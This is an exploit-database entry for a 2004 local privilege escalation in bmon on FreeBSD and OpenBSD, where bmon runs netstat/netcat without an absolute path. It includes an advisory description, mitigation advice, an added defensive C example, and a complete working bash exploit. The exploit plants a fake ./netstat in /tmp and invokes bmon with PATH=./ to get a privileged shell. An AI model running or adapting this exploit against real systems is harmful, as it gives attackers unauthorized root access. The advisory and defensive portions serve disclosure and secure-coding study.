Vendor: bmon
By: Idan Nahoum
CVSS: 7.5 (HIGH)
Local Privilege Escalation
CWE: 264
Product Name: bmon
Affected Version From: < 1.2.1_2
Affected Version To: < 1.2.1_2
Patch Exists: NO
Related CWE: CVE-2004-2059
CPE: a:bmon:bmon:1.2.1
Metasploit:
Other Scripts:
Platforms Tested: FreeBSD, OpenBSD
Year: 2004

Local Privilege Escalation in bmon

This exploit targets FreeBSD and OpenBSD systems running a bmon version earlier than 1.2.1_2. When bmon is executed with the -n parameter, it uses popen() to run netcat without an absolute path, so the command is resolved through the caller's PATH. Some BSDs have ACLs that refuse to run setuid files unless they are explicitly allowed, so the simple approach of creating a file called netcat that chmods bash +s does not work: bash has to be run directly by bmon, which uses ncurses. To get a usable shell, stdout must be redirected to stderr (bmon closes stdout) and the stty settings must be restored. The exploit uses this to execute a shell with elevated privileges.

Mitigation:

Upgrade to bmon version 1.2.1_2 or later. Ensure that the PATH environment variable is properly set and does not include any untrusted or malicious directories. Consider implementing stricter ACLs to prevent unauthorized execution of setuid files.
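The defect behind this entry is a privileged program calling popen() with a bare command name, which the shell resolves through the inherited PATH. The following is an added example, not bmon's own code: a check that rejects a PATH containing relative or empty entries (the condition the exploit relies on with PATH=./), and a replacement for popen() that runs a command only by absolute path under a fixed environment. The function names and the trusted directory list are assumptions chosen for this example.

```c
/* Added example (not from bmon): defending against PATH-based command
 * substitution in a privileged program. Assumed names: path_env_is_trusted,
 * run_fixed, and the fixed PATH value in safe_env. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Returns 1 if every PATH entry is absolute, 0 if any entry is relative or
 * empty. An empty entry or "." is looked up in the current directory, which
 * is exactly how PATH=./ made bmon pick up the attacker's ./netstat. */
int path_env_is_trusted(const char *path)
{
    if (path == NULL) return 0;
    const char *p = path;
    for (;;) {
        const char *sep = strchr(p, ':');
        size_t len = sep ? (size_t)(sep - p) : strlen(p);
        if (len == 0 || p[0] != '/') return 0;
        if (!sep) return 1;
        p = sep + 1;
    }
}

/* popen() replacement: argv[0] must be an absolute path, and the child runs
 * under a fixed minimal environment, so neither the caller's PATH nor any
 * other inherited variable influences which binary executes. Returns the
 * child's exit status, or -1 on refusal or failure. A real caller would add
 * the pipe for stdout that popen() provides. */
int run_fixed(char *const argv[])
{
    static char *const safe_env[] = { "PATH=/bin:/usr/bin:/sbin:/usr/sbin", NULL };
    if (argv == NULL || argv[0] == NULL || argv[0][0] != '/') return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(argv[0], argv, safe_env);
        _exit(127);                       /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```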

Exploit-DB raw data:

#!/usr/local/bin/bash

# Written by Idan Nahoum. idanna@bk.ru
# Local exploit for FreeBSD/OpenBSD with bmon < 1.2.1_2 installed.
# When bmon is executed with the -n parameter it popen()s netcat
# but fails to provide an absolute path.
# Some BSDs are configured with ACLs that do not allow setuid files to
# run except those that are explicitly allowed, so creating a file called
# netcat that chmod's +s bash would not work; bash needs to be run directly by
# bmon, which uses ncurses, so to get a usable shell we need to redirect
# stdout to stderr (stdout is closed) and restore the stty settings.
# http://www.vuxml.org/freebsd/938f357c-16dd-11d9-bc4a-000c41e2cdad.html

declare -r SPATH="${PATH}"                    # caller's PATH, restored inside the spawned shell
declare -r STTY_EXEC=$(which stty)
declare -r STTY_SETTINGS=$(${STTY_EXEC} -g)   # saved terminal settings, restored by the helper
declare -r QSHELL="/usr/local/bin/bash"
declare BMON_EXEC="/usr/local/sbin/bmon"

echo "$0 <path to bmon> [default: ${BMON_EXEC}]"

[ "$#" -gt "0" ] && BMON_EXEC="${1}"

[ -x "${BMON_EXEC}" ] ||
{
    echo "${BMON_EXEC} not found"
    exit 1
}

cd /tmp || exit 1

# apparently bmon closes stdout, so we run a shell with stdout redirected
# to stderr. The helper is written as ./netstat, the bare name that gets
# looked up through PATH=./ below; the stty values are expanded into it now.

cat > ./netstat <<EOF
#!/bin/sh
${STTY_EXEC} ${STTY_SETTINGS}
PATH=${SPATH} /bin/sh 1>&2
EOF

/bin/chmod 755 ./netstat
echo "trying to exploit"
PATH=./ "${BMON_EXEC}" -n

# milw0rm.com [2004-10-16]